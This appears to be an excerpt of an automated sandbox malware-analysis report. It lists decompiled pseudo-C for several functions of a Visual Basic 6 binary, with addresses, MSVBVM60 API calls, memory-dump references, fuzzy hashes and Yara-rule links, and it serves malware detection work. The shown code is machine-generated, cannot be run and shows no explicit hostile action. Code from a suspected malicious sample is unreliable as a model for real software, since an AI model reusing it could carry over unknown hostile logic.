				_t29 =  &_v68;
				_push(_t29);
				L00401688();
				_v72 = _t29;
				L0040167C();
				_t30 = _v72;
				if(_t30 == 0) {
					L9:
					asm("wait");
					_push(0x411e2d);
					return _t30;
				} else {
					__fp0 =  *0x401458;
					_push(__ecx);
					 *__esp =  *0x401458;
					__fp0 =  *0x401450;
					__fp0 =  *0x401450 *  *0x401448;
					if( *0x413000 != 0) {
						_push( *0x4012f4);
						_push( *0x4012f0);
						L00401514();
					} else {
						__fp0 = __fp0 /  *0x4012f0;
					}
					asm("fnstsw ax");
					if((__al & 0x0000000d) != 0) {
						goto L1;
					} else {
						_v80 = __fp0;
						__fp0 = _v80;
						_v68 = _v80;
						__fp0 =  *0x401440;
						_v72 =  *0x401440;
						__fp0 =  *0x401438;
						L00401580();
						__fp0 =  *0x401430;
						_v80 =  *0x401430;
						__fp0 =  *0x40142c;
						_v84 =  *0x40142c;
						__fp0 =  *0x401428;
						 *__esp =  *0x401428;
						_a4 =  *_a4;
						__eax =  *((intOrPtr*)( *_a4 + 0x2c0))(_a4, 0x1c2, __ecx, __ecx, __ecx, __eax, __ecx, __ecx);
						asm("fclex");
						_v72 = __eax;
						if(_v72 >= 0) {
							_v84 = _v84 & 0x00000000;
						} else {
							_push(0x2c0);
							_push(0x402564);
							_push(_a4);
							_push(_v72);
							L004016B2();
							_v84 = __eax;
						}
						goto L9;
					}
				}
				L1:
				return __imp____vbaFPException();
			}















                                  0x00411ce4
                                  0x00411ce5
                                  0x00411ce6
                                  0x00411cf1
                                  0x00411cf2
                                  0x00411cfb
                                  0x00411cfc
                                  0x00411d04
                                  0x00411d07
                                  0x00411d0e
                                  0x00411d13
                                  0x00411d18
                                  0x00411d1c
                                  0x00411d1d
                                  0x00411d22
                                  0x00411d29
                                  0x00411d33
                                  0x00411d34
                                  0x00411d37
                                  0x00411d38
                                  0x00411d3d
                                  0x00411d44
                                  0x00411d49
                                  0x00411d4f
                                  0x00411e11
                                  0x00411e11
                                  0x00411e12
                                  0x00000000
                                  0x00411d55
                                  0x00411d55
                                  0x00411d5b
                                  0x00411d5c
                                  0x00411d5f
                                  0x00411d65
                                  0x00411d72
                                  0x00411d7c
                                  0x00411d82
                                  0x00411d88
                                  0x00411d74
                                  0x00411d74
                                  0x00411d74
                                  0x00411d8d
                                  0x00411d91
                                  0x00000000
                                  0x00411d97
                                  0x00411d97
                                  0x00411d9a
                                  0x00411d9e
                                  0x00411da1
                                  0x00411da8
                                  0x00411dab
                                  0x00411db1
                                  0x00411db7
                                  0x00411dbe
                                  0x00411dc1
                                  0x00411dc8
                                  0x00411dcb
                                  0x00411dd2
                                  0x00411ddd
                                  0x00411de2
                                  0x00411de8
                                  0x00411dea
                                  0x00411df1
                                  0x00411e0d
                                  0x00411df3
                                  0x00411df3
                                  0x00411df8
                                  0x00411dfd
                                  0x00411e00
                                  0x00411e03
                                  0x00411e08
                                  0x00411e08
                                  0x00000000
                                  0x00411df1
                                  0x00411d91
                                  0x004014fc
                                  0x004014fc

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00411CFC
                                  • __vbaI4Str.MSVBVM60(00402E00,?,?,?,?,004014F6), ref: 00411D13
                                  • #698.MSVBVM60(?,00000000,00402E00,?,?,?,?,004014F6), ref: 00411D1D
                                  • __vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?,?,?,?,00000000,00402E00,?,?,?,?,004014F6), ref: 00411D38
                                  • __vbaFreeVar.MSVBVM60(00008008,?,?,?,?,?,?,?,?,00000000,00402E00,?,?,?,?,004014F6), ref: 00411D44
                                  • _adj_fdiv_m64.MSVBVM60(?,00008008,?,?,?,?,?,?,?,?,00000000,00402E00), ref: 00411D88
                                  • __vbaFpI4.MSVBVM60(?,?,?,00008008,?,?,?,?,?,?,?,?,00000000,00402E00), ref: 00411DB1
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402564,000002C0,?,?,?,00000000,?,?,?,00008008,?), ref: 00411E03
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$#698CheckChkstkFreeHresult_adj_fdiv_m64
                                  • String ID:
                                  • API String ID: 366650499-0
                                  • Opcode ID: 50990f4e49b86f0530b2bee83a11e22eb99306cbab102d384568ab1a2c446294
                                  • Instruction ID: 2be54c3ae656d41048e5c7554a792f7bad97f6ac3a4d3b4fe4663958f8da7182
                                  • Opcode Fuzzy Hash: 50990f4e49b86f0530b2bee83a11e22eb99306cbab102d384568ab1a2c446294
                                  • Instruction Fuzzy Hash: FE313871900209EFCB00AFA1DD49AEEBBB8FB08744F41496EF541B61B0C778A591DB6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004103F8, Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 46%
                                  			E004103F8(void* __ebx, void* __edi, void* __esi, void* __eflags, long long __fp0, intOrPtr* _a4, void* _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long* _v16;
				char _v36;
				void* _v40;
				signed int _v44;
				signed int _v56;
				signed int _t27;
				char* _t32;
				void* _t39;
				void* _t41;
				long long* _t42;

				_t42 = _t41 - 0xc;
				 *[fs:0x0] = _t42;
				L004014F0();
				_v16 = _t42;
				_v12 = 0x401300;
				_v8 = 0;
				_t27 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x20,  *[fs:0x0], 0x4014f6, _t39);
				L004016A6();
				_t32 =  &_v36;
				L004016A6();
				asm("fld1");
				_push(_t32);
				_push(_t32);
				 *_t42 = __fp0;
				asm("fld1");
				_push(_t32);
				_push(_t32);
				_v56 = __fp0;
				asm("fld1");
				_push(_t32);
				_push(_t32);
				 *_t42 = __fp0;
				_push(_t32);
				_push(_t32);
				 *_t42 =  *0x4012f8;
				L00401640();
				L00401646();
				asm("fcomp qword [0x4012f0]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags != 0) {
					_t27 =  *((intOrPtr*)( *_a4 + 0x254))(_a4, 0x4cf5);
					asm("fclex");
					_v44 = _t27;
					if(_v44 >= 0) {
						_t19 =  &_v56;
						 *_t19 = _v56 & 0x00000000;
						__eflags =  *_t19;
					} else {
						_push(0x254);
						_push(0x402564);
						_push(_a4);
						_push(_v44);
						L004016B2();
						_v56 = _t27;
					}
				}
				asm("wait");
				_push(0x4104d6);
				L0040169A();
				L0040169A();
				return _t27;
			}















                                  0x004103fb
                                  0x0041040a
                                  0x00410414
                                  0x0041041c
                                  0x0041041f
                                  0x00410426
                                  0x00410435
                                  0x0041043e
                                  0x00410446
                                  0x00410449
                                  0x0041044e
                                  0x00410450
                                  0x00410451
                                  0x00410452
                                  0x00410455
                                  0x00410457
                                  0x00410458
                                  0x00410459
                                  0x0041045c
                                  0x0041045e
                                  0x0041045f
                                  0x00410460
                                  0x00410469
                                  0x0041046a
                                  0x0041046b
                                  0x0041046e
                                  0x00410473
                                  0x00410478
                                  0x0041047e
                                  0x00410480
                                  0x00410481
                                  0x00410490
                                  0x00410496
                                  0x00410498
                                  0x0041049f
                                  0x004104bb
                                  0x004104bb
                                  0x004104bb
                                  0x004104a1
                                  0x004104a1
                                  0x004104a6
                                  0x004104ab
                                  0x004104ae
                                  0x004104b1
                                  0x004104b6
                                  0x004104b6
                                  0x0041049f
                                  0x004104bf
                                  0x004104c0
                                  0x004104c8
                                  0x004104d0
                                  0x004104d5

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00410414
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 0041043E
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 00410449
                                  • #672.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 0041046E
                                  • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 00410473
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401300,00402564,00000254), ref: 004104B1
                                  • __vbaFreeStr.MSVBVM60(004104D6,?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 004104C8
                                  • __vbaFreeStr.MSVBVM60(004104D6,?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 004104D0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$CopyFree$#672CheckChkstkHresult
                                  • String ID:
                                  • API String ID: 1189013271-0
                                  • Opcode ID: 91bc2551fc5003b36beee7b0e601ab57e8e6f65f113e2f6031a8352d8cb3d867
                                  • Instruction ID: 572c814ab1dea8ac10b7216eb09f2f24aff9d2f4754f07544d5c468de1fd09ae
                                  • Opcode Fuzzy Hash: 91bc2551fc5003b36beee7b0e601ab57e8e6f65f113e2f6031a8352d8cb3d867
                                  • Instruction Fuzzy Hash: 66215970400609BFDB04EF91CD8AEEEBBB5FF04744F04856EF541762A1CBB959848B58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410F99, Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00410F99(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				char _v44;
				char _v60;
				signed int _v64;
				signed int _v76;
				signed int _t34;
				char* _t35;
				void* _t44;
				void* _t46;
				intOrPtr _t47;

				_t47 = _t46 - 0xc;
				 *[fs:0x0] = _t47;
				L004014F0();
				_v16 = _t47;
				_v12 = 0x401388;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x4014f6, _t44);
				L004016A6();
				_t34 =  *((intOrPtr*)( *_a4 + 0x150))(_a4,  &_v44);
				asm("fclex");
				_v64 = _t34;
				if(_v64 >= 0) {
					_v76 = _v76 & 0x00000000;
				} else {
					_push(0x150);
					_push(0x402564);
					_push(_a4);
					_push(_v64);
					L004016B2();
					_v76 = _t34;
				}
				_push(0);
				_push(0);
				_push(_v44);
				_t35 =  &_v60;
				_push(_t35);
				L0040166A();
				_push(_t35);
				L004015D4();
				_v32 = _t35;
				L004016AC();
				L0040167C();
				_push(0x41106c);
				L0040169A();
				return _t35;
			}

















                                  0x00410f9c
                                  0x00410fab
                                  0x00410fb5
                                  0x00410fbd
                                  0x00410fc0
                                  0x00410fc7
                                  0x00410fd6
                                  0x00410fdf
                                  0x00410ff0
                                  0x00410ff6
                                  0x00410ff8
                                  0x00410fff
                                  0x0041101b
                                  0x00411001
                                  0x00411001
                                  0x00411006
                                  0x0041100b
                                  0x0041100e
                                  0x00411011
                                  0x00411016
                                  0x00411016
                                  0x0041101f
                                  0x00411021
                                  0x00411023
                                  0x00411026
                                  0x00411029
                                  0x0041102a
                                  0x00411032
                                  0x00411033
                                  0x00411038
                                  0x0041103e
                                  0x00411046
                                  0x0041104b
                                  0x00411066
                                  0x0041106b

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00410FB5
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 00410FDF
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401388,00402564,00000150), ref: 00411011
                                  • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041102A
                                  • __vbaI4Var.MSVBVM60(00000000,?,?,?,004014F6), ref: 00411033
                                  • __vbaFreeObj.MSVBVM60(00000000,?,?,?,004014F6), ref: 0041103E
                                  • __vbaFreeVar.MSVBVM60(00000000,?,?,?,004014F6), ref: 00411046
                                  • __vbaFreeStr.MSVBVM60(0041106C,00000000,?,?,?,004014F6), ref: 00411066
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$CallCheckChkstkCopyHresultLate
                                  • String ID:
                                  • API String ID: 2821350654-0
                                  • Opcode ID: 8c18b5e35568a8fe06b1c356a865ecbdca49d58e8c8ad09612d34e45ba4ca7bd
                                  • Instruction ID: 7e92c7062da88a3ba2654a96f2bb206637d04b0fa98a1a25a2155b0caf83d8bf
                                  • Opcode Fuzzy Hash: 8c18b5e35568a8fe06b1c356a865ecbdca49d58e8c8ad09612d34e45ba4ca7bd
                                  • Instruction Fuzzy Hash: 4021E570D00209ABCB00EFA5CC4AFDDBFB4AF08744F14442AF501BB2A1DB79A585DB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040FD38, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 49%
                                  			E0040FD38(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v28;
				intOrPtr* _v32;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				char _v52;
				signed int _v56;
				signed int _v60;
				signed int _t38;
				signed int _t42;
				intOrPtr _t50;

				_push(0x4014f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t50;
				_push(0x28);
				L004014F0();
				_v12 = _t50;
				_v8 = 0x401278;
				if( *0x41333c != 0) {
					_v52 = 0x41333c;
				} else {
					_push(0x41333c);
					_push(0x40276c);
					L004016B8();
					_v52 = 0x41333c;
				}
				_t5 =  &_v52; // 0x41333c
				_v32 =  *((intOrPtr*)( *_t5));
				_t38 =  *((intOrPtr*)( *_v32 + 0x4c))(_v32,  &_v28);
				asm("fclex");
				_v36 = _t38;
				if(_v36 >= 0) {
					_v56 = _v56 & 0x00000000;
				} else {
					_push(0x4c);
					_push(0x40275c);
					_push(_v32);
					_push(_v36);
					L004016B2();
					_v56 = _t38;
				}
				_v40 = _v28;
				_t42 =  *((intOrPtr*)( *_v40 + 0x28))(_v40);
				asm("fclex");
				_v44 = _t42;
				if(_v44 >= 0) {
					_v60 = _v60 & 0x00000000;
				} else {
					_push(0x28);
					_push(0x402b78);
					_push(_v40);
					_push(_v44);
					L004016B2();
					_v60 = _t42;
				}
				L004016AC();
				asm("wait");
				_push(0x40fe1b);
				return _t42;
			}
















                                  0x0040fd3d
                                  0x0040fd48
                                  0x0040fd49
                                  0x0040fd50
                                  0x0040fd53
                                  0x0040fd5b
                                  0x0040fd5e
                                  0x0040fd6c
                                  0x0040fd86
                                  0x0040fd6e
                                  0x0040fd6e
                                  0x0040fd73
                                  0x0040fd78
                                  0x0040fd7d
                                  0x0040fd7d
                                  0x0040fd8d
                                  0x0040fd92
                                  0x0040fda1
                                  0x0040fda4
                                  0x0040fda6
                                  0x0040fdad
                                  0x0040fdc6
                                  0x0040fdaf
                                  0x0040fdaf
                                  0x0040fdb1
                                  0x0040fdb6
                                  0x0040fdb9
                                  0x0040fdbc
                                  0x0040fdc1
                                  0x0040fdc1
                                  0x0040fdcd
                                  0x0040fdd8
                                  0x0040fddb
                                  0x0040fddd
                                  0x0040fde4
                                  0x0040fdfd
                                  0x0040fde6
                                  0x0040fde6
                                  0x0040fde8
                                  0x0040fded
                                  0x0040fdf0
                                  0x0040fdf3
                                  0x0040fdf8
                                  0x0040fdf8
                                  0x0040fe04
                                  0x0040fe09
                                  0x0040fe0a
                                  0x00000000

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 0040FD53
                                  • __vbaNew2.MSVBVM60(0040276C,0041333C,?,?,?,?,004014F6), ref: 0040FD78
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040275C,0000004C,?,?,?,?,?,?,?,?,?,004014F6), ref: 0040FDBC
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402B78,00000028,?,?,?,?,?,?,?,?,?,004014F6), ref: 0040FDF3
                                  • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 0040FE04
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$CheckHresult$ChkstkFreeNew2
                                  • String ID: <3A
                                  • API String ID: 1616694062-662753744
                                  • Opcode ID: ded28a753eca228befd398b9f335642b4f71a56a301e88c128f0942b7600d59e
                                  • Instruction ID: 164973db27257c78442e275dec870ccc3976acf5711a01752036df0fcb6abf9e
                                  • Opcode Fuzzy Hash: ded28a753eca228befd398b9f335642b4f71a56a301e88c128f0942b7600d59e
                                  • Instruction Fuzzy Hash: DE21F070941209AFCB10AF95C989FDEBBB5FB08715F20413AF401B62A1C7B959859BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040FEB8, Relevance: 10.6, APIs: 7, Instructions: 68COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 40%
                                  			E0040FEB8(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a36) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				char _v40;
				intOrPtr _v64;
				char _v72;
				signed int _v76;
				signed long long _v84;
				signed int _v88;
				signed int _t32;
				signed int _t33;
				intOrPtr _t45;

				_push(__ecx);
				_push(__ecx);
				_push(0x4014f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t45;
				_push(0x44);
				L004014F0();
				_v12 = _t45;
				_v8 = 0x4012a0;
				L004016A6();
				_push(1);
				_push( &_v40);
				L00401682();
				_v64 = 0x4029d0;
				_v72 = 0x8008;
				_push( &_v40);
				_t32 =  &_v72;
				_push(_t32);
				L00401688();
				_v76 = _t32;
				L0040167C();
				_t33 = _v76;
				if(_t33 != 0) {
					__fp0 =  *0x401298;
					__fp0 =  *0x401298 *  *0x401290;
					asm("fnstsw ax");
					if((__al & 0x0000000d) != 0) {
						return __imp____vbaFPException();
					}
					_v84 = __fp0;
					__fp0 = _v84;
					 *__esp = _v84;
					_a4 =  *_a4;
					__eax =  *((intOrPtr*)( *_a4 + 0x84))(_a4, __ecx);
					asm("fclex");
					_v76 = __eax;
					if(_v76 >= 0) {
						_v88 = _v88 & 0x00000000;
					} else {
						_push(0x84);
						_push(0x402564);
						_push(_a4);
						_push(_v76);
						L004016B2();
						_v88 = __eax;
					}
				}
				asm("wait");
				_push(0x40ffa1);
				L0040169A();
				return _t33;
			}















                                  0x0040febb
                                  0x0040febc
                                  0x0040febd
                                  0x0040fec8
                                  0x0040fec9
                                  0x0040fed0
                                  0x0040fed3
                                  0x0040fedb
                                  0x0040fede
                                  0x0040feeb
                                  0x0040fef0
                                  0x0040fef5
                                  0x0040fef6
                                  0x0040fefb
                                  0x0040ff02
                                  0x0040ff0c
                                  0x0040ff0d
                                  0x0040ff10
                                  0x0040ff11
                                  0x0040ff16
                                  0x0040ff1d
                                  0x0040ff22
                                  0x0040ff28
                                  0x0040ff2a
                                  0x0040ff30
                                  0x0040ff36
                                  0x0040ff3a
                                  0x004014fc
                                  0x004014fc
                                  0x0040ff3c
                                  0x0040ff3f
                                  0x0040ff43
                                  0x0040ff49
                                  0x0040ff4e
                                  0x0040ff54
                                  0x0040ff56
                                  0x0040ff5d
                                  0x0040ff79
                                  0x0040ff5f
                                  0x0040ff5f
                                  0x0040ff64
                                  0x0040ff69
                                  0x0040ff6c
                                  0x0040ff6f
                                  0x0040ff74
                                  0x0040ff74
                                  0x0040ff5d
                                  0x0040ff7d
                                  0x0040ff7e
                                  0x0040ff9b
                                  0x0040ffa0

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 0040FED3
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 0040FEEB
                                  • #526.MSVBVM60(?,00000001,?,?,?,?,004014F6), ref: 0040FEF6
                                  • __vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0040FF11
                                  • __vbaFreeVar.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0040FF1D
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402564,00000084,?,00008008,?,?,?,?,?,?,?,?,?,?), ref: 0040FF6F
                                  • __vbaFreeStr.MSVBVM60(0040FFA1,00008008,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0040FF9B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$#526CheckChkstkCopyHresult
                                  • String ID:
                                  • API String ID: 3968931124-0
                                  • Opcode ID: 52b2aa45888dfd3c73f6edcd803046a69f59324f7d76b78d2b34c3fe0e292531
                                  • Instruction ID: 8d0e242a5eba0cab3f294300692cf7c761173305b0535ebc50287b9c101040ea
                                  • Opcode Fuzzy Hash: 52b2aa45888dfd3c73f6edcd803046a69f59324f7d76b78d2b34c3fe0e292531
                                  • Instruction Fuzzy Hash: B3214570900209ABCB10DF90C94AFAEBBB8BF05744F54457BF001B61E0CB79AA49CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410503, Relevance: 10.5, APIs: 7, Instructions: 45COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E00410503(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4, void* _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v28;
				char _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				short _v64;
				char* _t20;
				short _t21;
				intOrPtr _t37;

				_push(0x4014f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t37;
				_push(0x30);
				L004014F0();
				_v12 = _t37;
				_v8 = 0x401310;
				L004016A6();
				_v52 = _a4;
				_v60 = 9;
				L00401634();
				_t20 =  &_v44;
				_push(_t20);
				L0040163A();
				_v64 =  ~(0 | _t20 != 0x0000ffff);
				L0040167C();
				_t21 = _v64;
				if(_t21 != 0) {
					_push(0x83);
					L0040162E();
				}
				_push(0x41059e);
				L0040169A();
				return _t21;
			}













                                  0x00410508
                                  0x00410513
                                  0x00410514
                                  0x0041051b
                                  0x0041051e
                                  0x00410526
                                  0x00410529
                                  0x00410536
                                  0x0041053e
                                  0x00410541
                                  0x0041054e
                                  0x00410553
                                  0x00410556
                                  0x00410557
                                  0x00410567
                                  0x0041056e
                                  0x00410573
                                  0x00410579
                                  0x0041057b
                                  0x00410580
                                  0x00410580
                                  0x00410585
                                  0x00410598
                                  0x0041059d

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 0041051E
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 00410536
                                  • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 0041054E
                                  • #562.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 00410557
                                  • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 0041056E
                                  • #570.MSVBVM60(00000083,?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 00410580
                                  • __vbaFreeStr.MSVBVM60(0041059E,?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 00410598
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$#562#570ChkstkCopy
                                  • String ID:
                                  • API String ID: 1684261552-0
                                  • Opcode ID: e5a4cb91285b6e6c2bdcbc82f7dc670d4cb2fa70b2a08a99c8cfed767bedcd7d
                                  • Instruction ID: be80c1f4793bddd0cd212bd2adac50d453a697bd7fa040dd5e09b8695df159bf
                                  • Opcode Fuzzy Hash: e5a4cb91285b6e6c2bdcbc82f7dc670d4cb2fa70b2a08a99c8cfed767bedcd7d
                                  • Instruction Fuzzy Hash: E7014070900209ABDB04EB96C842FEEBB78EF04B48F44453EB401B71E1EB7865858B58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411E45, Relevance: 9.1, APIs: 6, Instructions: 58COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 55%
                                  			E00411E45(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v28;
				char _v32;
				char _v48;
				signed int _v52;
				signed int _v64;
				signed int _t31;
				char* _t32;
				signed int _t34;
				void* _t38;
				void* _t41;
				void* _t43;
				intOrPtr _t44;

				_t38 = __edx;
				_t44 = _t43 - 0xc;
				 *[fs:0x0] = _t44;
				L004014F0();
				_v16 = _t44;
				_v12 = 0x401470;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x28,  *[fs:0x0], 0x4014f6, _t41);
				_t31 =  *((intOrPtr*)( *_a4 + 0x190))(_a4,  &_v32);
				asm("fclex");
				_v52 = _t31;
				if(_v52 >= 0) {
					_v64 = _v64 & 0x00000000;
				} else {
					_push(0x190);
					_push(0x402564);
					_push(_a4);
					_push(_v52);
					L004016B2();
					_v64 = _t31;
				}
				_push(0);
				_push(5);
				_push(_v32);
				_t32 =  &_v48;
				_push(_t32);
				L0040166A();
				_push(_t32);
				L004015D4();
				asm("cdq");
				_t34 = _t32 - _t38 >> 1;
				_v28 = _t34;
				L004016AC();
				L0040167C();
				_push(0x411f0a);
				return _t34;
			}


















                                  0x00411e45
                                  0x00411e48
                                  0x00411e57
                                  0x00411e61
                                  0x00411e69
                                  0x00411e6c
                                  0x00411e73
                                  0x00411e82
                                  0x00411e91
                                  0x00411e97
                                  0x00411e99
                                  0x00411ea0
                                  0x00411ebc
                                  0x00411ea2
                                  0x00411ea2
                                  0x00411ea7
                                  0x00411eac
                                  0x00411eaf
                                  0x00411eb2
                                  0x00411eb7
                                  0x00411eb7
                                  0x00411ec0
                                  0x00411ec2
                                  0x00411ec4
                                  0x00411ec7
                                  0x00411eca
                                  0x00411ecb
                                  0x00411ed3
                                  0x00411ed4
                                  0x00411ed9
                                  0x00411edc
                                  0x00411ede
                                  0x00411ee4
                                  0x00411eec
                                  0x00411ef1
                                  0x00000000

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00411E61
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401470,00402564,00000190), ref: 00411EB2
                                  • __vbaLateIdCallLd.MSVBVM60(?,?,00000005,00000000), ref: 00411ECB
                                  • __vbaI4Var.MSVBVM60(00000000,?,?,?,004014F6), ref: 00411ED4
                                  • __vbaFreeObj.MSVBVM60(00000000,?,?,?,004014F6), ref: 00411EE4
                                  • __vbaFreeVar.MSVBVM60(00000000,?,?,?,004014F6), ref: 00411EEC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$CallCheckChkstkHresultLate
                                  • String ID:
                                  • API String ID: 499844174-0
                                  • Opcode ID: 05fcca0e18eba31a8a0cc7486ce6da4fbeb3141542873c7c39560194384ff5fb
                                  • Instruction ID: 48c4e24d60d2228713d5a87c4590d85a478a19edd9c21b19172041a2a3b5417b
                                  • Opcode Fuzzy Hash: 05fcca0e18eba31a8a0cc7486ce6da4fbeb3141542873c7c39560194384ff5fb
                                  • Instruction Fuzzy Hash: 68110A75D00209BFCB00AFA5CC49FDEBBB9BB04744F10842AF505B71B1D779A5458B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411F7B, Relevance: 9.1, APIs: 6, Instructions: 58COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 55%
